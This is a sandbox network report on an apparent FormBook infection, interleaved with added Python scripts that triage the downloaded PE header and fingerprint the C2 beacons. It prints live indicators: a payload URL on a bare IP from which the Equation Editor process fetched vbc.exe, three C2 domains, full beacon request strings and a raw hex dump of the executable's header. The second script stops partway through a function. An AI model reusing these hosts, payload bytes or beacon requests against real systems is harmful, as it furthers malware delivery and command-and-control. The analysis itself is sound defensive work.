                                                             Nov 25, 2021 17:23:58.167386055 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167412043 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.167422056 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.167445898 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.167480946 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.170453072 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.284533978 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284571886 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284585953 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284596920 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284611940 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284627914 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284641981 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284657955 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284672022 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284687996 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284703970 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284718990 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284734964 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284749985 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284765005 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284781933 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284796000 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284811974 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284826994 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284842014 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284847975 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.284872055 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284884930 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.284892082 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.284892082 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284909010 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.284914017 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.284919024 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.284928083 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284946918 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284957886 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.284965992 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284976006 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.284985065 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.284992933 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.285003901 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.285022020 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.285032034 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.285038948 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.285043955 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.285058022 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.285073996 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.285075903 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.285088062 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.285094976 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.285135984 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.285145044 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.287367105 CET | 49165 | 80 | 192.168.2.22 | 198.46.199.153
                                                             Nov 25, 2021 17:23:58.402185917 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.402247906 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.402287006 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22
                                                             Nov 25, 2021 17:23:58.402324915 CET | 80 | 49165 | 198.46.199.153 | 192.168.2.22

                                                            UDP Packets

                                                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                             Nov 25, 2021 17:25:22.871083021 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                                             Nov 25, 2021 17:25:22.928951025 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                                             Nov 25, 2021 17:25:43.451653957 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                                             Nov 25, 2021 17:25:43.503045082 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                                                             Nov 25, 2021 17:26:03.897233963 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                                                             Nov 25, 2021 17:26:04.095473051 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22

                                                            DNS Queries

                                                             Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                             Nov 25, 2021 17:25:22.871083021 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.mountfrenchlodge.net | A (IP address) | IN (0x0001)
                                                             Nov 25, 2021 17:25:43.451653957 CET | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.cuteprofessionalscrubs.com | A (IP address) | IN (0x0001)
                                                             Nov 25, 2021 17:26:03.897233963 CET | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.troddu.com | A (IP address) | IN (0x0001)

                                                            DNS Answers

                                                             Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                             Nov 25, 2021 17:25:22.928951025 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.mountfrenchlodge.net | mountfrenchlodge.net | - | CNAME (Canonical name) | IN (0x0001)
                                                             Nov 25, 2021 17:25:22.928951025 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | mountfrenchlodge.net | - | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                             Nov 25, 2021 17:25:43.503045082 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.cuteprofessionalscrubs.com | cuteprofessionalscrubs.com | - | CNAME (Canonical name) | IN (0x0001)
                                                             Nov 25, 2021 17:25:43.503045082 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | cuteprofessionalscrubs.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                             Nov 25, 2021 17:26:04.095473051 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.troddu.com | troddu.com | - | CNAME (Canonical name) | IN (0x0001)
                                                             Nov 25, 2021 17:26:04.095473051 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | troddu.com | - | 162.240.31.112 | A (IP address) | IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • 198.46.199.153
                                                            • www.mountfrenchlodge.net
                                                            • www.cuteprofessionalscrubs.com

                                                            HTTP Packets

                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                             0 | 192.168.2.22 | 49165 | 198.46.199.153 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                             Timestamp | kBytes transferred | Direction | Data
                                                             Nov 25, 2021 17:23:57.811558008 CET | 0 | OUT | GET /70007/vbc.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 198.46.199.153
                                                            Connection: Keep-Alive
                                                            Nov 25, 2021 17:23:57.931919098 CET | 1 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 25 Nov 2021 16:23:57 GMT
                                                            Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25
                                                            Last-Modified: Thu, 25 Nov 2021 02:23:58 GMT
                                                            ETag: "b4a00-5d193aabff887"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 739840
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-msdownload
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be f3 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3e 0b 00 00 0a 00 00 00 00 00 00 be 5b 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 5b 0b 00 4f 00 00 00 00 60 0b 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 3c 0b 00 00 20 00 00 00 3e 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 06 00 00 00 60 0b 00 00 08 00 00 00 40 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 48 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 5b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 d0 21 01 00 03 00 00 00 8c 01 00 06 7c 6a 02 00 f0 f0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 
00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa0>[ `@ @l[O`H H.text< > `.rsrcH`@@@.relocH@B[HH!|js}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#
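The response above is what EQNEDT32.EXE pulled from a bare IP: an Apache server hands back `application/x-msdownload` and the body starts with `MZ`, so the first bytes of the dump are enough to triage the file before touching the full sample. The following parser is an added example, not part of the Joe Sandbox report. Its only input is the first 0x1F0 bytes of the "Data Raw" dump copied verbatim (DOS header, PE signature, COFF and optional headers and the three section headers); the remaining bytes of the 739840-byte body are not reproduced. It recovers what the report states elsewhere for the first `vbc.exe` instance ("Programmed in: .Net C# or VB.NET", i.e. a populated CLR data directory), checks that the section table ends exactly at the declared Content-Length (the download was complete), and decodes the COFF link timestamp, which lands on the same second as the server's `Last-Modified` header. The parser is deliberately limited to PE32 images, which is what this 32-bit sample is.

```python
"""PE-header triage of the body served for GET /70007/vbc.exe (session 0).

Added example, not part of the Joe Sandbox report. CAPTURED_HEADER_HEX is the
first 0x1F0 bytes of the report's "Data Raw" dump copied verbatim: DOS header,
PE signature, COFF and optional headers, and the three section headers. The
rest of the 739840-byte body is not reproduced here.
"""
import struct
from datetime import datetime, timezone

CAPTURED_HEADER_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
50 45 00 00 4c 01 03 00 be f3 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3e 0b 00
00 0a 00 00 00 00 00 00 be 5b 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00
04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00
6c 5b 0b 00 4f 00 00 00 00 60 0b 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00
00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00
1c 3c 0b 00 00 20 00 00 00 3e 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 72 73 72 63 00 00 00 48 06 00 00 00 60 0b 00 00 08 00 00 00 40 0b 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 48 0b 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42
"""

CONTENT_LENGTH = 739840      # Content-Length of the same HTTP response
DIR_CLR_RUNTIME_HEADER = 14  # data-directory slot of the .NET CLR header
IMAGE_FILE_MACHINE_I386 = 0x014C


def parse_pe32(blob: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> sections."""
    if blob[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry = struct.unpack_from("<I", blob, opt + 16)[0]
    image_base = struct.unpack_from("<I", blob, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", blob, opt + 68)
    ndirs = struct.unpack_from("<I", blob, opt + 92)[0]
    dirs = [struct.unpack_from("<II", blob, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr, *_, flags = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va,
                         "vsize": vsize, "raw_ptr": rptr, "raw_size": rsize, "flags": flags})
    return {"machine": machine, "timestamp": stamp, "characteristics": chars,
            "entry_point": entry, "image_base": image_base, "subsystem": subsystem,
            "dll_characteristics": dll_chars, "directories": dirs, "sections": sections}


def triage(blob: bytes, content_length: int) -> dict:
    """Derive the facts an analyst wants from the headers alone."""
    pe = parse_pe32(blob)
    # The file must reach the end of the last section's raw data; a shorter
    # Content-Length would mean the capture (or the download) was truncated.
    expected_size = max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])
    _clr_rva, clr_size = pe["directories"][DIR_CLR_RUNTIME_HEADER]
    return {
        "machine": pe["machine"],
        "is_managed": clr_size > 0,  # a populated CLR header means a .NET assembly
        "link_time_utc": datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc).isoformat(),
        "entry_point": pe["entry_point"],
        "image_base": pe["image_base"],
        "aslr": bool(pe["dll_characteristics"] & 0x0040),  # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
        "nx": bool(pe["dll_characteristics"] & 0x0100),    # IMAGE_DLLCHARACTERISTICS_NX_COMPAT
        "sections": [s["name"] for s in pe["sections"]],
        "expected_size": expected_size,
        "size_matches_content_length": expected_size == content_length,
    }


def triage_captured_download() -> dict:
    """Run the triage on the header bytes captured in session 0."""
    return triage(bytes.fromhex("".join(CAPTURED_HEADER_HEX.split())), CONTENT_LENGTH)


if __name__ == "__main__":
    for key, value in triage_captured_download().items():
        print(f"{key}: {value}")
```

The size check is the one to keep in a pipeline: `.text` (0x200 + 0xB3E00), `.rsrc` (0xB4000 + 0x800) and `.reloc` (0xB4800 + 0x200) chain without gaps and end at 0xB4A00 = 739840, so the whole body arrived. Note that the second `vbc.exe` instance further down is reported as native code with FormBook Yara hits at its 0x400000 image base, which is the hollowing the report flags, not a property of the downloaded .NET file itself.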


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            1 | 192.168.2.22 | 49166 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 25, 2021 17:25:22.961991072 CET | 785 | OUT | GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1
                                                            Host: www.mountfrenchlodge.net
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 17:25:23.079817057 CET | 785 | IN | HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 16:25:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6192576d-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            2 | 192.168.2.22 | 49167 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 25, 2021 17:25:43.527704000 CET | 786 | OUT | GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1
                                                            Host: www.cuteprofessionalscrubs.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 17:25:43.645796061 CET | 787 | IN | HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 16:25:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6192576d-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
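Sessions 1 and 2 are the injected explorer.exe beaconing: a GET that carries a 7-byte all-NUL body, only `Host` and `Connection: close` as headers (no User-Agent, no Accept), the same `/9gr5/` path on two different hosts that both resolve to 34.102.136.180, and a second query parameter (`wrx=KX64Xbs0GT8`) that does not change between requests while the first one does. Both hosts answered 403 through a Google-fronted openresty, so nothing about the C2 protocol beyond the request shape is visible here. The code below is an added example, not part of the report: it rebuilds the two requests from the dumps above (CRLF line endings and the NUL body are taken from the "Data Raw" lines), adds a constructed browser-style request as a control, scores each on the traits just listed, and extracts the fields that stay constant across hosts, which is what ties two otherwise unrelated domains to one build.

```python
"""Indicators shared by the two explorer.exe requests in sessions 1 and 2.

Added example, not part of the report. FORMBOOK_REQ_1/2 are rebuilt from the
two request dumps above (CRLF line endings assumed; the body is the 7-byte
"Data Raw: 00 00 00 00 00 00 00"). BENIGN_REQ is a constructed browser-style
request used only as a control.
"""

FORMBOOK_REQ_1 = (
    b"GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1\r\n"
    b"Host: www.mountfrenchlodge.net\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)
FORMBOOK_REQ_2 = (
    b"GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1\r\n"
    b"Host: www.cuteprofessionalscrubs.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)
BENIGN_REQ = (  # constructed control request, not from the capture
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept: */*\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser. Query values are kept verbatim (no
    percent or plus decoding) so base64-looking tokens survive intact."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = [tuple(pair.partition("=")[::2]) for pair in query.split("&") if pair]
    return {"method": method, "path": path, "params": params, "headers": headers, "body": body}


def beacon_indicators(raw: bytes) -> dict:
    """Score one request on the traits visible in the captured beacons."""
    req = parse_request(raw)
    h = req["headers"]
    flags = {
        "get_with_body": req["method"] == "GET" and len(req["body"]) > 0,
        "body_all_nul": len(req["body"]) > 0 and set(req["body"]) == {0},
        "no_user_agent": "user-agent" not in h,
        "no_accept": "accept" not in h,
        "connection_close": h.get("connection", "").lower() == "close",
    }
    return {"host": h.get("host"), "path": req["path"], "params": req["params"],
            "flags": flags, "score": sum(flags.values())}


def campaign_link(raws) -> dict:
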